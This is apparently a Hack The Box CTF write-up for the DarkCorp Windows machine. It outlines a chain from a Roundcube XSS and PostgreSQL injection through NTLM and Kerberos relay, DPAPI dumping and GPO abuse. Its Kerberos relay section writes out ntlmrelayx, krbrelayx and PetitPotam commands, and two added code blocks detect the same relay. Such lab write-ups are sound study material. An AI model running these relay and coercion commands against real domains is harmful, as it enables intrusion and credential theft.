HTB_DarkCorp
Windows (Insane)
Summary
user:
1. CVE-2024-42009 (XSS with a callback that reads mail contents) yields a subdomain and a password-reset link
2. PostgreSQL injection; reading a log file gives a password -> ebelford shell
3. PostgreSQL command execution -> postgres shell -> decrypt a GPG file to get a password
4. Internal lateral movement -> SSRF on port 5000 -> NTLM relay (insufficient privileges) -> krbrelayx -> forged TGS -> wmiexec logon
root:
5. DPAPI abuse -> DonPAPI -> domain user enumeration + password spraying -> john
6. john -> GenericWrite over angela.w; pywhisker (shadow credentials) + gettgtpkinit yield angela.w's hash
7. UPN spoofing, log on as angela.w.adm -> password stored by SSSD
8. taylor.b.adm -> BloodHound -> GPO abuse
Takeaways: ┭┮﹏┭┮
Sometimes searching directly for a CVE or exploit turns up nothing; check the project's release notes instead, since they state which vulnerabilities were fixed.
This gives the same result as a chisel SOCKS proxy, just more conveniently:
ssh -D 1080 [email protected]
Q2: Because the domain controller is on the internal network, BloodHound needs a DNAT; as cutearmadillo explained, add a dnat line to the proxychains configuration:
dnat 10.10.11.54 172.16.20.1
#!/bin/bash
# Get this host's primary IP (Linux: hostname -I lists all addresses, take the first)
my_ip=$(hostname -I | awk '{print $1}')
subnet=$(echo "$my_ip" | awk -F '.' '{print $1"."$2"."$3}')
echo "[*] Local IP: $my_ip"
echo "[*] Scanning subnet: $subnet.0/24"
# Probe hosts .1 through .254, one ping each, in parallel
for i in {1..254}; do
    target="$subnet.$i"
    (ping -c 1 -W 1 "$target" &> /dev/null && echo "[+] Host up: $target") &
done
wait
echo "[*] Scan complete!"
Burp through the SOCKS proxy: got a 401.
Q3: PetitPotam.py problem
  File "/usr/lib/python3.12/threading.py", line 1075, in _bootstrap_inner
    self.run()
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattack.py", line 36, in run
    ADCSAttack._run(self)
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 78, in _run
    certificate_store = self.generate_pfx(key, certificate)
                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/impacket/examples/ntlmrelayx/attacks/httpattacks/adcsattack.py", line 100, in generate_pfx
    p12 = crypto.PKCS12()
          ^^^^^^^^^^^^^
  File "/usr/lib/python3/dist-packages/cryptography/utils.py", line 72, in __getattr__
    obj = getattr(self._module, attr)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: module 'OpenSSL.crypto' has no attribute 'PKCS12'
Usually this means impacket is too old for the installed pyOpenSSL: crypto.PKCS12 was removed from recent pyOpenSSL releases, and current impacket builds the PFX without it.
pip install --upgrade impacket
# pip install generally only works once you are inside the virtual environment
References
Write-ups:
https://4xura.com/ctf/htb/htb-writeup-darkcorp
https://global.ptsecurity.com/analytics/pt-esc-threat-intelligence/fake-attachment-roundcube-mail-server-attacks-exploit-cve-2024-37383-vulnerability
https://github.com/bartfroklage/CVE-2024-37383-POC
https://github.com/squid22/PostgreSQL_RCE/blob/main/postgresql_rce.py
NTLM-relay:
https://book.hacktricks.wiki/en/generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.html#ntml-relay-attack
This attack uses an SMB authentication session to access the target machine and, if it succeeds, yields a SYSTEM shell. The key prerequisites are:
The authenticating user must have local administrator rights on the relay target.
SMB signing must not be required on the target.
https://blog.csdn.net/qq_18811919/article/details/129245212
https://github.com/topotam/PetitPotam
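The second prerequisite is the one a defender can verify and remove: it is decided by the SecurityMode flags the server returns in its SMB2 NEGOTIATE response (MS-SMB2 2.2.4), where "signing enabled" is only an offer and only "signing required" closes the relay. The parser below is an added example for this note, not code from the write-up or from the linked references. It reads the SecurityMode field from a negotiate response and reports the posture; the byte strings are constructed test vectors produced by `build_negotiate_response`, not captures, and the "enabled but not required" state is the one a relay depends on.

```python
import struct

# MS-SMB2 2.2.4 NEGOTIATE Response, SecurityMode flags
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

SMB2_PROTOCOL_ID = b"\xfeSMB"
SMB2_HEADER_LEN = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001
NEGOTIATE_RESPONSE_STRUCT_SIZE = 65


def parse_negotiate_response(msg: bytes) -> dict:
    """Parse an SMB2 NEGOTIATE response (64-byte header plus fixed body) and return
    the fields a signing check needs. Raises ValueError for anything else."""
    if len(msg) < SMB2_HEADER_LEN + 6 or msg[:4] != SMB2_PROTOCOL_ID:
        raise ValueError("not an SMB2 message")
    hdr_size, _credit_charge, status, command, _credits, flags = struct.unpack_from(
        "<HHIHHI", msg, 4)
    if hdr_size != SMB2_HEADER_LEN or command != SMB2_NEGOTIATE:
        raise ValueError("not an SMB2 NEGOTIATE message")
    if not flags & SMB2_FLAGS_SERVER_TO_REDIR:
        raise ValueError("NEGOTIATE request, not a server response")
    struct_size, security_mode, dialect = struct.unpack_from("<HHH", msg, SMB2_HEADER_LEN)
    if struct_size != NEGOTIATE_RESPONSE_STRUCT_SIZE:
        raise ValueError(f"unexpected NEGOTIATE response StructureSize {struct_size}")
    return {"status": status, "dialect": dialect, "security_mode": security_mode}


def signing_posture(security_mode: int) -> str:
    """Translate the SecurityMode flags into the three states that matter for relay."""
    if security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return "required"
    if security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return "enabled-not-required"
    return "disabled"


def relay_exposed(msg: bytes) -> bool:
    """True when the server would accept an unsigned session, i.e. when a relayed
    authentication could be used against it; False once signing is required."""
    return signing_posture(parse_negotiate_response(msg)["security_mode"]) != "required"


def build_negotiate_response(security_mode: int, dialect: int = 0x0302) -> bytes:
    """Constructed test vector (not a capture): a minimal, well-formed SMB2 NEGOTIATE
    response with the given SecurityMode, STATUS_SUCCESS and an all-zero ServerGuid."""
    header = SMB2_PROTOCOL_ID + struct.pack(
        "<HHIHHIIQIIQ",
        SMB2_HEADER_LEN,             # StructureSize
        0,                           # CreditCharge
        0,                           # Status = STATUS_SUCCESS
        SMB2_NEGOTIATE,              # Command
        1,                           # CreditResponse
        SMB2_FLAGS_SERVER_TO_REDIR,  # Flags
        0,                           # NextCommand
        0,                           # MessageId
        0,                           # Reserved
        0,                           # TreeId
        0,                           # SessionId
    ) + b"\x00" * 16                 # Signature (negotiate is never signed)
    body = struct.pack("<HHHH", NEGOTIATE_RESPONSE_STRUCT_SIZE, security_mode, dialect, 0)
    body += b"\x00" * 16                                           # ServerGuid
    body += struct.pack("<IIII", 0, 0x800000, 0x800000, 0x800000)  # Capabilities, Max* sizes
    body += struct.pack("<QQ", 0, 0)                               # SystemTime, ServerStartTime
    body += struct.pack("<HHI", SMB2_HEADER_LEN + 64, 0, 0)        # SecurityBuffer off/len, ctx offset
    body += b"\x00"                                                # Buffer (1 byte, hence size 65)
    return header + body


if __name__ == "__main__":
    for mode in (0, SMB2_NEGOTIATE_SIGNING_ENABLED,
                 SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED):
        resp = build_negotiate_response(mode)
        info = parse_negotiate_response(resp)
        print(f"dialect 0x{info['dialect']:04x} signing={signing_posture(mode):22s} "
              f"relay-exposed={relay_exposed(resp)}")
```

Against real traffic, pass it the first server response after the client's NEGOTIATE, taken from a capture. The fix on the Windows side is the policy "Microsoft network server: Digitally sign communications (always)" on every host, which sets SIGNING_REQUIRED and makes relay_exposed return False.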
kerberos-relayx:
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
1. Use ntlmrelayx to add a malicious DNS record. The record name must carry the marshaled target-information suffix below (see the Project Zero post under "Other"):
1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
for example dc011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
impacket-ntlmrelayx -t "ldap://172.16.20.1" --no-smb-server --no-dump --no-da --no-acl --no-validate-privs --add-dns-record 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' kali-ip
2. Presumably this is to obtain a certificate for the later logon:
proxychains python ~/htb/tools/krb*/krbrelayx.py -t 'https://dc-01.darkcorp.htb/certsrv/certfnsh.asp' --adcs -v 'WEB-01$'
3. Coerce the domain controller into authenticating to us:
proxychains python ~/htb/tools/Petit*/PetitPotam.py -u victor.r -p 'v??' -d darkcorp.htb 'dc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' web-01.darkcorp.htb
If this succeeds you get a pfx.
4. Request a TGT with gettgtpkinit.py -cert-pfx
https://github.com/dirkjanm/krbrelayx/tree/master?tab=readme-ov-file#krbrelayxpy
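From the defender's side, the telltale of step 1 is the record itself: a legitimate-looking host label with a CredMarshalTargetInfo blob ('1' followed by base64) glued onto it, created in AD-integrated DNS by an ordinary account. The following is an added example, not code from the write-up or from krbrelayx: it scans constructed dnsNode-creation events for such names, splits off the host label, and base64-decodes the suffix. The "1UWhRC" prefix it keys on is taken from the record name used above and is assumed to be constant across such blobs; the looser shape-only pattern and the event format are my own constructions.

```python
import base64
import binascii
import re
from typing import List, NamedTuple, Optional, Tuple

# CredMarshalTargetInfo output is the literal '1' followed by base64 of a
# CREDENTIAL_TARGET_INFORMATION blob. "1UWhRC" is how the suffix used on this
# page (dc-011UWhRC...) begins; assumption: that prefix is constant for such blobs.
MARSHALED_TARGET_INFO = re.compile(r"1UWhRC[A-Za-z0-9+/]{20,}={0,2}")
# Fallback (constructed heuristic): '1' plus a long base64 run closing a label.
# '+' and '/' are not legal hostname characters and a 32+ char alphanumeric tail
# is unusual, but this can false-positive, so it is reported with low confidence.
LOOSE_BLOB = re.compile(r"1[A-Za-z0-9+/]{32,}={0,2}$")


class Finding(NamedTuple):
    record: str                 # full record name as logged
    host_label: str             # the host name the blob was appended to
    blob: str                   # the marshaled suffix, including the leading '1'
    decoded_len: Optional[int]  # bytes after base64-decoding, None if not decodable
    confidence: str             # "high" (known prefix) or "low" (shape only)


def decoded_length(blob: str) -> Optional[int]:
    """Base64-decode the part after the '1' marker, tolerating missing padding."""
    b64 = blob[1:].rstrip("=")
    try:
        return len(base64.b64decode(b64 + "=" * (-len(b64) % 4), validate=True))
    except (binascii.Error, ValueError):
        return None


def inspect_dns_name(name: str) -> Optional[Finding]:
    """Return a Finding if the first label of `name` embeds a marshaled target-info blob."""
    label = name.split(".")[0]
    confidence = "high"
    match = MARSHALED_TARGET_INFO.search(label)
    if match is None:
        confidence = "low"
        match = LOOSE_BLOB.search(label)
    if match is None:
        return None
    blob = match.group(0)
    return Finding(name, label[:match.start()], blob, decoded_length(blob), confidence)


def scan_dns_events(lines: List[str]) -> List[Tuple[str, Finding]]:
    """Scan tab-separated 'timestamp<TAB>creator<TAB>dnsNode' events (a constructed
    export format) and return (creator, Finding) for every record that embeds a blob."""
    findings = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        _ts, creator, node = line.rstrip("\n").split("\t")
        finding = inspect_dns_name(node)
        if finding is not None:
            findings.append((creator, finding))
    return findings


# Constructed sample events: dnsNode creations as a Directory Service Changes
# audit export might list them. Only the second record carries a blob.
SAMPLE_EVENTS = """\
# time<TAB>creator<TAB>record
2025-02-01T10:02:11Z\tDARKCORP\\dhcp-svc\tws-105.darkcorp.htb
2025-02-01T10:03:42Z\tDARKCORP\\low.priv\tdc-011UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA.darkcorp.htb
2025-02-01T10:04:09Z\tDARKCORP\\jdoe\tprn-3f.darkcorp.htb
""".splitlines()

if __name__ == "__main__":
    for creator, f in scan_dns_events(SAMPLE_EVENTS):
        print(f"[{f.confidence}] {creator} created {f.record}: "
              f"host label '{f.host_label}' + {len(f.blob)}-char blob "
              f"(decodes to {f.decoded_len} bytes)")
```

The events would come from Directory Service Changes auditing on the DNS application partitions (object creation is event 5137) or from a periodic zone export. A hit whose host label is a domain controller or another server, created by an account that does not normally register records, is worth an alert regardless of the confidence level.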
dpapi:
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.html
DonPAPI tool: dumps DPAPI secrets
https://github.com/login-securite/DonPAPI
python -m pip install poetry
git clone https://github.com/login-securite/DonPAPI.git
cd DonPAPI
poetry update
# poetry run DonPAPI did not work for me; I used the command below instead ↓
poetry install
GPO-Abuse:
https://book.hacktricks.wiki/en/windows-hardening/active-directory-methodology/acl-persistence-abuse/index.html?highlight=GPO#sharpgpoabuse---abuse-gpo
https://github.com/FSecureLABS/SharpGPOAbuse
https://github.com/rootSySdk/PowerGPOAbuse
https://github.com/Hackndo/pyGPOAbuse.git
Other:
https://github.com/ShutdownRepo/pywhisker
https://github.com/dirkjanm/PKINITtools
https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html#:~:text=Marshaled%20Target%20Information%20SPN
https://www.synacktiv.com/publications/relaying-kerberos-over-smb-using-krbrelayx
Originally published on the WeChat public account 羽泪云小栈: HTB_DarkCorp